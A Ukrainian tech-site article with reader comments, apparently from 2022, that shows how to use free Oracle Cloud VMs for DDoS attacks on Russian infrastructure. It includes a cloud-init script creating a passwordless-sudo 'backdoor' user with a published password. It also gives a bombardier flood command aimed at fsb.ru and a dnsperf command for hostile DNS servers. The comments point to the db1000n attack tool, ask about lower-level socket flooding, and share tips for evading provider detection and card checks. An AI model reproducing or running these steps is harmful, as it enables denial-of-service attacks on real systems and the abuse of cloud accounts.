Як використовувати безкоштовні Oracle Cloud VMs самі знаєте для чого

Підписуйтеся на Telegram-канал «DOU #tech», щоб не пропустити нові технічні статті.

Привіт, кіберкотики! Минулого року Oracle анонсував, що деякі з хмарних ресурвів будуть безкоштовними. У цьому переліку є 2 AMD based Compute VMs with 1/8 OCPU** and 1 GB memory each. Я вважаю, що настав час скористатися цими ресурсами для наших потреб.

Перелік кроків, що потрібно зробити, щоб скористатися.

  1. Реєструємося на Oracle Cloud. При реєстрації потрібно буде прив’язати картку, з вас знімуть 1$, а потім повернуть. Я не розписую реєстрацію, там все просто, розберетесь.
  2. Після реєстрації заходимо у список Instances та створюємо новий instance
  3. Усі поля залишаємо як є (або змінюємо за бажанням). Тільки в поле Cloud-init script вставляємо

    #cloud-config
    users:
     - default
     - name: backdoor
       sudo: ALL=(ALL) NOPASSWD:ALL
       lock_passwd: false
       passwd: $6$MFhXlUHt$JG.sn2M4ReeZ.V/TDs8AWJzhA1anX0iUbE0WvfR8v/8d4eGv8v6EwhyiKO.6VixMaC8/dG.YQce01QV8w1.dZ0



    Цей код створить юзера backdoor з паролем 1LoveOracle!! Цей користувач не буде мати можливості з’єднання по SSH і тому я вважаю, що безпечно створити такого користувача. Якщо хочете більшої безпеки — створіть користовача з іншим паролем або змініть пароль при першому логіні (команда sudo passwd backdoor). (Iснує можливість використовувати SSH, але я той метод не описую, тому що він складніше)
  4. Клікаємо Create, бачимо попередження про No SSH access, але ігноруємо його. Нам SSH для наших цілей непотрібен.
  5. Чекаємо ~15 секунд
  6. Запускаємо консоль
  7. Вводимо логін backdoor, пароль 1LoveOracle!!
  8. Ставимо Docker, потрібно буде послідовно виконати наступні команди(я взяв їх тут):
    sudo yum update
    sudo yum install -y yum-utils
    sudo yum-config-manager --add-repo https://download.docker.com/linux/centos/docker-ce.repo
    sudo yum update
    sudo yum install docker-ce docker-ce-cli containerd.io
    sudo systemctl start docker
    sudo systemctl enable docker
    sudo groupadd docker
    sudo usermod -aG docker backdoor
    newgrp docker

    Якщо є якісь питання по командам, читайте оригінальну статтю. Там усі кроки детально розписані.
  9. Розпочинаємо навантажувальне тестування :-)
    Який вебсайт «тестувати» та які docker image використовувати ви знаєте краще мене, слідкуйте за актуальними Telegram каналами. Наприклад:
    docker run -ti --rm alpine/bombardier -c 1000 -d 36000s -l http://www.fsb.ru/

Сподобалась стаття? Натискай «Подобається» внизу. Це допоможе автору виграти подарунок у програмі #ПишуНаDOU

👍ПодобаєтьсяСподобалось13
До обраногоВ обраному8
LinkedIn
Дозволені теги: blockquote, a, pre, code, ul, ol, li, b, i, del.
Ctrl + Enter
Дозволені теги: blockquote, a, pre, code, ul, ol, li, b, i, del.
Ctrl + Enter

Ни как не хочет принимать ни Digital ни Интернет карты Привата

на данный момент не удается создать Always-free-eligible инстанс. Ошибка следующая:

```Out of capacity for shape VM.Standard.A1.Flex in availability domain AD-1. Create the instance in a different availability domain or try again later. If you specified a fault domain, try creating the instance without specifying a fault domain. If that doesn’t work, please try again later.```

FYI: France South (Marseille) — Home Region. Другой availability domain выбрать не получается.

Поднял платные 3 инстанса на AWS и 1 инстанс на DigitalOcean. Оракл как всегда, если честно...

Он у меня не отображался вообще под лейблом Always-free-eligible. Но я уже забил на оракл клауд. Нет времени заниматься этим, чтобы сэкономить $10-20

Благодарю за инструкцию/ Создал машину(На azure не получалась не проходила проеку карточка) правда с доступом получилось только по ssh с ключом. и Запустил ,но пока нdb1000. Не знаю прикроет ли оракле мою машину буду наблюдать

Нет /Ниже по ветке обсуждалось Цитирую

Вот машина на azure останвливается каждые часа три четыре(с сообщением привышен лимит сpu и сети) После этого надо перезапускать /Но что классно дают новый ip (Oracle не останавливает)

Добрий вечір. Оракл ще дає акаунти чи вже заблокував цю можливість? Вже кілька днів безуспішні спроби. Вчора техпідтримка відповіла що не може розголошувати чому так відбувається. IP адреса чиста, динаміка, кукіз чисті, браузери спробував різні. Сьогодні спробував Оперу турбо — той самий результат:

Ошибка при обработке операции
Не удалось завершить регистрацию. Распространенные ошибки при регистрации: (а) Использование предоплаченных карт. Oracle принимает только кредитные и дебетовые карты. (б) Преднамеренное или непреднамеренное маскирование местоположения или идентификационных данных. (в) Ввод неполных или неточных данных счета. Если вы допустили одну их вышеперечисленных ошибок, повторите попытку. В противном случае обратитесь в службу поддержки клиентов Oracle.

Не знаю в чому проблема. Інші пишуть, що працює...

а на каком именно этапе у Вас проблема возникла?
Я расскажу о своих
1.Почему-то не сработала почта gmail(не приходило письмо подтверждение) При этом на temporary mail https://temp-mail сработало
С карточкой (приват) проблем(в отличие от azure проблем не было(доллар(в грн эквиваленте) заморозил потом вернул)
При создании машины есть важный нюанс ключ приватный ssh надо обязательно скачать сразу(режим галочки generate key pair) Если это не сделать там проблемы с копией в нужное места публичного ключа/
Потом просто ssh -i pathto/ssh-key-2022-03-10.key [email protected]*****
Важно! пользователь opc(Это дефолтный для Oracle linux) и обязательно ограничить доступ к ключу в своей оси
сhmod 400 pathto/ssh-key-2022-03-10.key
В этом случае намного быстрее чем web console
И нужные файлы (например уже скомпилированную db1000n можно передать командой scp

а какой город, язык заполнения анкеты, код города? карта виза или мастеркард?

не могу зарегистрироваться, описал тут
dou.ua/...​rums/topic/36849/#2371779

Вообще я регистрировался и в Azure и Oracle Cloud и надо сказать: действительно проблема с валидацией карточек существует .Понять ,что нужно делать это метод тыка/ Я вводил город адрес и на английском и на русском Свою ФИО тоже (индекс должен быть тоже верным как минимум центра города) Пробовал разные карточки знакомых. Это и вправду какая-то лотерея /логику мне пока понять не удалось

т.е. какая приватовская карточка с ораклом сработала вы не помните?

Скажите я так понял что инструмент bombardier работает по http(s) post/get В этом случае инфоа об атакующем ip попадает на более высокий уровень(логи сервера база и легче сделать выборку для добавления IP в черный список ОС iptable host -drop (Причем с потерей 255 адресов типа 178.23.4.*/24 И уже приобретение нового адреса виртуалки может не иметь смысла) / есть ли более низкоуровневый инструмент типа «срать в socket» в этом случае нужен более квалифицированный админ netstat и другие инструменты ,скрипты писать и т.д / Да оно сразу не так эффективно как прямой post но тут нужно больше количества сокет флуда(а может и еще более низкоуровневого) И оно сложнее обнаруживается и требует более квалифицированного «отражателя» на другом конце.

Не смог создать аккаунт.
После ввода карты и прохождения 3d secure

Нажимаю на кнопку продолжить регистрацию, мне выводиться вот такая ошибка

Error processing transaction

We’re unable to complete your sign up. Common sign up errors are due to: (a) Using prepaid cards. Oracle only accepts credit card and debit cards (b) Intentionally or unintentionally masking one’s location or identity © Entering incomplete or inaccurate account details. Please try again if this applies to you. Otherwise, contact Oracle Customer Service.

Хотя деньги с карты снимаються и возвращаються.
Карта обычная приватбанк универсал, долларовая.

Кто с таким сталкивался?

схоже неправ-ні дані ввів, у мене з 2гої спроби зарег-сь

Як тільки відключив ВПН відразу пройшло. Спробуйте.

Попробував пару місяців тому з різними емейлами та карточками (дебетова, кредитна, зарплатна і тд.), не вийшло створити аккаунт :(
Навіть написав в підтримку, на що отримав відповідь одним реченням в дусі «ми не можемо вам допомгти, вибачте...»

Аналогично! Разные карты, разные email а результат нулевой. Тоже писал в ТП ответа даже не получил.

Аналогично. Непонятно, хотелось бы узнать у тех кто проходил регистрацию подробности заполнения регистрационных данных (язык заполнения, язык страницы регистрации), банк, тип карты.
У меня не получилось с приватом, абанком, монобанком. Регистрироваться пытался с русской страницы регистрации, заполнял данные регистрации в соответствие указанным к свифту соответствующих банков, карты все были Visa. Язык заполнения английский.

Тоже самое у меня. Не принимает карты от Привата ни Diginal ни Интернет карты.

аналогічна ситуація. Ще місяць тому, все працювало і реєструвалось. Думаю вони просто «прикрили лавочку» враховуючи, що підтримка теж не надає ніякої адекватної відповіді

т.е. вы повторно регистрироваться пытаетесь по тем же реквизитам и карте?
Я еще до войны пытался зарегистрироваться — у меня результат не изменился.

Самая актуальна координация, на текущий момент это:
— github.com/Arriven/db1000n
— t.me/ddos_separ

Вот как создатели описывают преимущества:
Це програмне забезпечення для координованого проведення ддос атак на інфраструктуру окупанта. Основна перевага цього методу в тому, що користувачам для проведення атак потрібно всього лише запустити програму на ПК, а вся координація буде проводитись і налаштовуватись адмінами за підтримки спеціалістів з кібербезпеки.

Инструкция по использованию: docs.google.com/...​ZJOClHqHOs5cu20Mc/preview либо README репы.

А робити опитування їх DNS не простіше?

Головна мета — мати можливість використовувати Docker.
Для опитування DNS змінюється лише останній крок:
docker run -it guessi/dnsperf:alpine -e DNS_SERVER_ADDR=ворожий DNS

Это хорошая инициатива, поддерживаю. Но есть нюанс и должны это понимать, что у AWS, Microsoft Azure или Google Cloud есть логика нагрузку, её тип, направленность и другие аномалии в трафике. Потому исходящие DDoS атаки пресекаются. То есть запустить можно, у ребята работает по пару дней даже. Но будет это эффективным короткое время.

Я в свою очередь предлагаю также атаковать ещё изнутри, арендуя российские сервера, тут подробнее bit.ly/barrierproject

В любом случае, спасибо за статью.

а что происходит потом? аккаунт блокируют?

Ну вот пока несколько дней работает /Пока не заблокировали

У меня вот тоже как раз несколько дней работает — пока не заблокировали. Просто интересно, есть ли живые примеры, кому присылали предупреждение или бан

Вот машина на azure останвливается каждые часа три четыре(с сообщением привышен лимит сpu и сети) После этого надо перезапускать /Но что классно дают новый ip (Oracle не останавливает)

На AWS Lightsail выкл и вкл виртуалки тоже генерирует новый IPv4. Но IPv6 остается неизменным, странно как-то показалось. Но потом нашел, что в конфигурации можно сделать renew IPv6 вручную.

автор, забери з тексту «дані залишаємо як є», бо DOU читають ка$$апи

не зрозумів. Там нема ніяких даних для доступу. Цей логін пароль буде працювати лише через консоль, коли залогінишся в Oracle Cloud.

Підписатись на коментарі